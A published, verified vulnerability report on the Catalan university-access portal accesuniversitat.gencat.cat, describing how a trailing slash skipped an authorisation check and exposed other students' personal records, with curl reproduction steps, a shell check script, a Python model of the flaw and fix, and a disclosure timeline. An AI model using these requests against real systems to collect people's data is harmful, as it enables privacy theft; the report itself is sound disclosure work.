
Students can (still) see other students' personal information at accesuniversitat.gencat.cat
Status: Verified · Public

Description

This is a more in-depth view of vulnerability report T1, which does not appear to have been properly fixed: the fix can be bypassed with very little effort.

Summary

Some endpoints of the accesuniversitat.gencat.cat API do have a security check, but it is evidently matched against the exact endpoint URL: appending a trailing slash to the URL is enough to skip the check, while the API still serves the request.

Reproduction steps

  1. Open Chrome (any browser with developer tools will do).
  2. Go to https://accesuniversitat.gencat.cat/accesuniversitat/login.
  3. Open the Developer Tools and switch to the Network tab.
  4. Sign in with a student account by entering the account's DNI and password and clicking Accedir.
  5. In the Developer Tools, click the last request made to the https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/login/token API endpoint and open its Response tab. Copy or note the token returned by the server.

As an example, the server will return something like {"token":"abcdef","hostName":"lt20stx2.cpd2.intranet.gencat.cat","activeSessions":1}, where abcdef is the token we're looking for.

  6. Open a terminal (make sure curl is installed) and run the following commands, where {token} is the token retrieved in step 5:
    • curl --header "Authentication: Bearer {token}" https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/estudiants/1218208/
    • curl --header "Authentication: Bearer {token}" https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/estudiants/?page={page}, where {page} is the number of the page to load (for instance, 1).
  7. The first command returns the record of the user whose id is in the URL (here, 1218208) even though it is not the signed-in user; changing the id returns a different user's record. The second command returns a page of user records at a time, i.e. the same data as the first command but for many users per request. Note that the only difference from the URLs that the security check does block is the slash after the id (or after estudiants).
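The reproduction steps above, turned into a repeatable regression check (an added example, not part of the original report): it requests each resource by its canonical URL and by its trailing-slash URL and reports whether the bypass is still present. BASE, TOKEN and TARGET_ID are assumptions supplied by the authorised tester; the header name "Authentication: Bearer" and the id 1218208 are the ones the report uses.

```shell
#!/bin/sh
# Added example, not part of the original report: re-run the requests from the
# reproduction steps with and without the trailing slash and classify the result.
# BASE, TOKEN and TARGET_ID are assumptions supplied by the tester.
set -u

BASE="${BASE:-https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1}"
TOKEN="${TOKEN:-}"                  # "token" value from the login/token response (step 5)
TARGET_ID="${TARGET_ID:-1218208}"   # an id that is NOT the signed-in student

# http_status URL -> prints only the HTTP status code of a GET with the token
http_status() {
    curl -s -o /dev/null -w '%{http_code}' \
         --header "Authentication: Bearer $TOKEN" "$1"
}

# verdict STATUS_WITHOUT_SLASH STATUS_WITH_SLASH -> one word
#   NO_CHECK : even the canonical URL served the resource
#   BYPASS   : canonical URL refused, trailing-slash URL served it (still vulnerable)
#   FIXED    : neither spelling served it
verdict() {
    if [ "$1" = 200 ]; then
        echo NO_CHECK
    elif [ "$2" = 200 ]; then
        echo BYPASS
    else
        echo FIXED
    fi
}

# check_student ID -> tests /estudiants/ID and /estudiants/ID/
check_student() {
    s1=$(http_status "$BASE/estudiants/$1")
    s2=$(http_status "$BASE/estudiants/$1/")
    echo "GET $BASE/estudiants/$1  -> $s1"
    echo "GET $BASE/estudiants/$1/ -> $s2"
    echo "single record: $(verdict "$s1" "$s2")"
}

# check_listing -> tests /estudiants?page=1 and /estudiants/?page=1
check_listing() {
    s1=$(http_status "$BASE/estudiants?page=1")
    s2=$(http_status "$BASE/estudiants/?page=1")
    echo "GET $BASE/estudiants?page=1  -> $s1"
    echo "GET $BASE/estudiants/?page=1 -> $s2"
    echo "paginated listing: $(verdict "$s1" "$s2")"
}

if [ -n "$TOKEN" ]; then
    check_student "$TARGET_ID"
    check_listing
else
    echo "TOKEN not set: define TOKEN (step 5 of the report) and re-run" >&2
fi
```

Run it as `TOKEN=abcdef sh check.sh`; a student token should produce FIXED for both resources once the check is applied to every spelling of the path, and the listing should not be reachable with a student token at all.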

Attack vector

This vulnerability can be used to harvest, programmatically, the personal and sensitive information of the thousands of Catalan people registered on this government website: their birth dates, home addresses, email addresses, DNIs and phone numbers. Therefore, I think this vulnerability should be fixed as soon as possible.

Suggested resolution

To fix this issue, the security check that already rejects requests without the trailing slash (for instance https://accesuniversitat.gencat.cat/accesuniversitat/accesuniversitat-rs/AppJava/api/v1/estudiants) must also be applied to requests whose URL ends in a slash. Rather than adding a second URL pattern for the slash variant, the request path should be normalised (at least: the trailing slash stripped) before the check runs, or better, the check should be tied to the resource the router resolves instead of to a URL pattern, so that no spelling of a path the router accepts can skip it. The check itself should also be object-level: a student's token should only be able to read that student's own record, and the paginated listing of all students should not be reachable with a student token at all.
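The mechanism the report implies (a security filter whose URL patterns are stricter than the router's) and the fix suggested above, as an added Python model that is not the portal's own code (the live application is Java, per the AppJava path) nor the reporter's. The route patterns, the Session object with its hypothetical staff role, and the two-row student table are all constructed for the example; it also goes a little beyond the page in that normalize() collapses repeated slashes as well as dropping the trailing one.

```python
"""Added example (not from the original report or the gencat.cat code base):
an exact-match authorisation filter in front of a trailing-slash-tolerant
router, which lets /estudiants/<id>/ past the check that blocks
/estudiants/<id>, beside a version that normalises the path and authorises
the resolved route. All data and names are constructed for the example."""

from dataclasses import dataclass
import re

# Constructed sample data (not real records): the session belongs to 1000001,
# the id 1218208 is the one used in the report's curl command.
STUDENTS = {
    1000001: {"nom": "Student A", "dni": "11111111H"},
    1218208: {"nom": "Student B", "dni": "22222222J"},
}


@dataclass
class Session:
    student_id: int        # owner of the bearer token
    staff: bool = False    # hypothetical role allowed to list students


# Router: what the resource layer will serve. The trailing slash is optional,
# as the report shows it was on the live API.
ROUTES = [
    ("one", re.compile(r"^/api/v1/estudiants/(\d+)/?$")),
    ("all", re.compile(r"^/api/v1/estudiants/?$")),
]

# Vulnerable filter: a separate list of *exact* patterns written without the
# trailing slash. Any spelling the router accepts but this list does not
# match reaches the handler unauthorised.
PROTECTED_EXACT = [
    ("one", re.compile(r"^/api/v1/estudiants/(\d+)$")),
    ("all", re.compile(r"^/api/v1/estudiants$")),
]


def authorize(route, params, session):
    """Object-level rule shared by both versions: a student may read only
    their own record; listing all students needs the staff role."""
    if route == "one":
        return int(params[0]) == session.student_id
    if route == "all":
        return session.staff
    return False


def serve(route, params):
    if route == "one":
        return STUDENTS.get(int(params[0]))
    return list(STUDENTS.values())


def strip_query(url_path):
    return url_path.split("?", 1)[0]


def vulnerable_handle(url_path, session):
    """Filter matches the raw path; the router matches more loosely."""
    path = strip_query(url_path)
    for route, pat in PROTECTED_EXACT:          # 1. security check
        m = pat.match(path)
        if m and not authorize(route, m.groups(), session):
            return 403, None
    for route, pat in ROUTES:                   # 2. routing
        m = pat.match(path)
        if m:
            return 200, serve(route, m.groups())
    return 404, None


def normalize(path):
    """Canonical form: collapse repeated slashes, drop a trailing slash."""
    path = re.sub(r"/+", "/", path)
    return path.rstrip("/") or "/"


def fixed_handle(url_path, session):
    """Normalise first, resolve the route once, and authorise *that* route
    before serving it, so check and handler cannot disagree about the path."""
    path = normalize(strip_query(url_path))
    for route, pat in ROUTES:
        m = pat.match(path)
        if m:
            if not authorize(route, m.groups(), session):
                return 403, None
            return 200, serve(route, m.groups())
    return 404, None


if __name__ == "__main__":
    student = Session(1000001)
    for url in ("/api/v1/estudiants/1218208", "/api/v1/estudiants/1218208/",
                "/api/v1/estudiants/?page=1"):
        print(url, "vulnerable:", vulnerable_handle(url, student)[0],
              "fixed:", fixed_handle(url, student)[0])
```

The vulnerable handler returns 403 for /estudiants/1218208 but 200 for /estudiants/1218208/ and for /estudiants/?page=1, which is exactly the behaviour in the reproduction steps; the fixed handler returns 403 for all three with a student token and only serves a student's own record.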


This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Details

Vendor: CESICAT (Generalitat de Catalunya)
Product: Portal d'accés a la universitat
Reported: Jun 11 2019, 1:00 PM
Deadline: 97 days
CVE: CVE-2019-12837

Event Timeline

avm99963 triaged this task as Priority-0 priority.Jun 10 2019, 3:18 AM
avm99963 created this task.

I emailed an AES-256 encrypted ZIP file with a translation of this report in Catalan on Jun 10, 3:18 AM and I just gave CESICAT the key via another contact method, so I'm setting this vulnerability as reported on Jun 11, 1:00 PM because this is when they first had access to the document.

avm99963 set Reported to Jun 11 2019, 1:00 PM.Jun 11 2019, 1:03 PM

I haven't updated this report for a long time, so this is the timeline of the most important events from when CESICAT got access to the vulnerability details until now:

  • Jun 19, 2019, 12:01 AM: I sent them an email stating that in accesuniversitat.gencat.cat's version 1.7.6B002 the vulnerability seemed to be fixed, so I asked them whether it was completely fixed. Also, I stated that I had requested a CVE and had been assigned CVE-2019-12837. Finally, I also told them that once the vulnerability was fixed (and after reaching an agreement within the 90-day period), I would like to coordinate the publication of the vulnerability details with them.
  • Then there were several fruitless emails (one sent by them and three sent by me).
  • Aug 23, 2019, 11:40 AM: CESICAT told me that they had been working, and were still working, on the original report. Also, they told me that they would contact me shortly to provide me with more information. Approx. 2 hours later I replied, thanking them for their response and telling them that I was waiting for the update.
  • Sep 8, 2019, 2:24 PM: I sent them an email stating that the deadline was a day away (Sep 9), and so I would add 7 more days to the deadline so they could solve the problem in case it wasn't completely solved, and also to try to establish whether we would publish the vulnerability details together. I also stated that the new deadline would be Sep 16, but as @Douglasbot gives a grace period of one day and checks whether a report should be autopublished early in the morning, and this report was received by them at midday, it wouldn't be autopublished until Sep 18.

Therefore, I'm updating the deadline field to 97 instead of the original 90 days.

CESICAT sent me an email on Sep 13, 2019, 4:54 PM stating the following (translated from Catalan):

Regarding your notification concerning the security incident that occurred in the management application of the Portal d'Accés a la Universitat, we inform you that the technical staff immediately started a technical review of all of its functionality and detected some issues, which have already been duly resolved.

Therefore, as I already verified some time ago that this was solved (and could also verify it right now in version 1.8.0), I'm changing this report's status to verified.

Although my intention was to coordinate with them the disclosure of this report, they haven't shown any sign of wanting to coordinate it nor talk about a date for publication (although I've insisted several times in our email correspondence), so I will let this report be autopublished when the deadline is exceeded (which means it will be autopublished tomorrow early in the morning). I already warned them with sufficient time that if the deadline is exceeded the report will be autopublished, so I think this is the best way to publish it.

This is a PDF document with the entire email correspondence we've had:

And this is the original report which I sent them in the email correspondence (it is the same as this report, but translated into Catalan):

Douglasbot changed the visibility from "Restricted Project (Project)" to "Public (No Login Required)".Sep 18 2019, 7:13 AM

The deadline has been exceeded -- automatically publishing vulnerability report.